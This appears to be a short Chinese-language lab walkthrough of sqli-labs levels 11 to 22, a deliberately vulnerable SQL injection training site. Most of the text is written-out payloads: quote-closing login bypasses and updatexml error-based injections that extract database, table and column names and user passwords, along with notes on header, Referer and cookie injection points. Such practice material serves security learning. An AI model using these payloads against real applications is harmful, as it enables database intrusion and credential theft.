less-11
less-12
同11,”);
less-13
也可以使用sqlmap:
less-14
uname=admin”#&passwd=admin&Submit=Submit
同13;
也可以使用sqlmap
less-15
uname=admin’#&passwd=admin&Submit=Submit
less-16
uname=admin”)#&passwd=admin&Submit=Submit
less-17
必须要知道用户的名字
updatexml(1,concat(0x7e,(SELECT@@version),0x7e),1)
使用这个语句构造
uname=admin&passwd=admin’ and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#&Submit=Submit
使用MySQL 5.5.29版本
less-18
使用modheader插件
‘ or updatexml(1,concat(0x7e,(database())),1) or ‘1’=’1
‘ or updatexml(1,concat(0x7e,(database())),1),’’,’’)#
‘ or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1),’’,’’)#
‘ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1)),1),’’,’’)#
‘ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’users’ limit 0,1)),1),’’,’’)#
‘ or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1),’’,’’)#
‘ or updatexml(1,concat(0x7e,(select password from security.users limit 0,1)),1),’’,’’)#
less-19
和18关基本一致referer
less-20
cookie存在注入
union select 联合查询
less-21
less-22
同21”
若有收获,就点个赞吧
0 人点赞
